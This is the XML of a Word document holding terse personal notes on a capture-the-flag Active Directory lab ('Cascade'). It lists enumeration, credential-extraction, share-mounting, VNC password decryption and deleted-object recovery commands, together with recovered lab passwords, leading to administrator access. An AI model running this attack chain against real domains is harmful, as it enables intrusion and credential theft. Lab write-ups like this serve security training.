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3806544D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0214C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cascade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34B4B1B9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B5624C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this AD labs I obtain the perfect knowledge of use the AD tools to obtain the connections and if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B5624C"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 w:rsidR="00B5624C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> fails then how we can obtain the perfect administrator connection.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CD3C298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0214C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214C4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0214C4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0214C4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0214C4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0214C4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0214C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534F7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6AB32B00" w:rsidR="00843DCE" w:rsidRDefault="00D43E6F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rpcclient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‘’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 w:rsidR="000916C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="000916C5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enumdomusers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000916C5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EB9CFA" w14:textId="70A8D09A" w:rsidR="00D43E6F" w:rsidRDefault="000916C5" w:rsidP="0036780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querydispinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1233398B" w14:textId="0EC29A5F" w:rsidR="00E02076" w:rsidRDefault="00E02076" w:rsidP="0036780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queryuser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0x452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arksvc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copy from the info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE43332" w14:textId="77777777" w:rsidR="00D43E6F" w:rsidRDefault="00D43E6F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7A0A64B9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check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crackmapexec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if we can</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC712F3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ldapsearch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-x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-s base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namigcontexts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here we obtain the perfect domain name = DC=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cascade,DC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>=local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2EFD53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ldapsearch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-x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-s sub -b ‘DC=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cascade,DC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=local’ = we obtain a lot of information now just find the password which looks like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cascadeLegacyPwd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of Ryan Thompson (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r.thompson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>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B9152B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what we obtain is encoded so find the base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6DFF6B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echo -n clk0bjVldmE= | base64 -d = rY4n5eva</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EC7BD1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crackmapexec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r.thompson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-p rY4n5eva = its done but not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</w:p>
    <w:p w14:paraId="6056F9DC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crackmapexec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r.thompson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-p rY4n5eva - -shares = we read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data&amp;print</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03BC4D35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crackmapexec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r.thompson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-p rY4n5eva -M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spider_plus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it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provide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us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data output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49B68D18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tmp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cme_spider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/plus/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t_ip.json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rthompson.spider.smb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cat it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4FAF60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mount -t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cifts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-o ‘user=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r.thompson</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=rY4n5eva’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/Data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mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B07F807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mount -t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cifts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-o ‘user=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r.thompson</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=rY4n5eva’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NetLogon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mnt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netlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3BC2EBA7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/data = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>find .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-type f = ./it/temp/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s.smit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install.reg = cat it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD7279B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password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C173927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search google and notice something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tightvnc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encypted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frizb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61F870D2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msfconsole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irb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paste fix key = follow steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130D1876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password = sT333ve2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7870171E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users.lst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sT333ve2 = we match with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s.smit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F33D933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true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so we obtain user.txt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101EDBF4" w14:textId="5BFB996C" w:rsidR="003E7644" w:rsidRPr="003E7644" w:rsidRDefault="003E7644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3E7644">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7.0. Failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328BA0D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/all = to see what we have accessible to us</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C765426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net user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r.thompson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/domain = IT group =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s.smit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is audit + it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3286FDF6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shares/audit we notice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get it to the kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC99D21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sqlite3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audit.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>db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.dump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= and we obtain the password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arksvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="749E083A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just notice walkthrough for password = w3lc0meFr3Ind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAE820B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arksvc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paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABFCC44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also work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</w:p>
    <w:p w14:paraId="0B0C38AE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</w:p>
    <w:p w14:paraId="65C7F5AC" w14:textId="77777777" w:rsidR="003E7644" w:rsidRDefault="003E7644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6BB02A58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</w:t>
      </w:r>
      <w:r w:rsidR="003E7644">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w: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 Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD1A56C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48C3F162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ADObject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SearchBase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“CN=Deleted Objects, DC=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Cascade,DC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>=local” -Filter {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ObjectClass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-eq “user”}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IncludeDeletedObjects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-Properties * = we obtain encode password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20100B94" w14:textId="77777777" w:rsidR="003E7644" w:rsidRDefault="003E7644" w:rsidP="003E764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echo -n paste | base64-d </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2DC30" w14:textId="24041B73" w:rsidR="00843DCE" w:rsidRDefault="003E764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administrator -p baCT3r1an00dles = its work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gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>we  obtain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root.txt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2A503C60" w:rsidR="00843DCE" w:rsidRDefault="003E76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the desktop of the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>administrator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we obtain the root.txt file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214C4"/>
    <w:rsid w:val="000916C5"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000C51FD"/>
    <w:rsid w:val="00135E28"/>
    <w:rsid w:val="001411FA"/>
    <w:rsid w:val="001A09D4"/>
    <w:rsid w:val="002072E5"/>
    <w:rsid w:val="002873E7"/>
    <w:rsid w:val="00295B23"/>
    <w:rsid w:val="002B1482"/>
    <w:rsid w:val="0036540A"/>
    <w:rsid w:val="0036780E"/>
    <w:rsid w:val="003D578C"/>
    <w:rsid w:val="003E5CB0"/>
    <w:rsid w:val="003E7644"/>
    <w:rsid w:val="003F2751"/>
    <w:rsid w:val="00415575"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00534BCD"/>
    <w:rsid w:val="005A5309"/>
    <w:rsid w:val="00605E6C"/>
    <w:rsid w:val="006B469E"/>
    <w:rsid w:val="00725C37"/>
    <w:rsid w:val="007878BC"/>
    <w:rsid w:val="007D148E"/>
    <w:rsid w:val="007D48D6"/>
    <w:rsid w:val="007E41F0"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00887358"/>
    <w:rsid w:val="00895B3D"/>
    <w:rsid w:val="0090530F"/>
    <w:rsid w:val="00950BAD"/>
    <w:rsid w:val="009F5226"/>
    <w:rsid w:val="00A30DAB"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A534F7"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00AA4850"/>
    <w:rsid w:val="00B21864"/>
    <w:rsid w:val="00B30ED9"/>
    <w:rsid w:val="00B560B1"/>
    <w:rsid w:val="00B5624C"/>
    <w:rsid w:val="00B66D5F"/>
    <w:rsid w:val="00CE0432"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D13E72"/>
    <w:rsid w:val="00D43E6F"/>
    <w:rsid w:val="00D905C9"/>
    <w:rsid w:val="00E02076"/>
    <w:rsid w:val="00E32DAC"/>
    <w:rsid w:val="00E50E25"/>
    <w:rsid w:val="00E74D83"/>
    <w:rsid w:val="00ED1F91"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F644FE"/>
    <w:rsid w:val="00FB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52</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T16:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>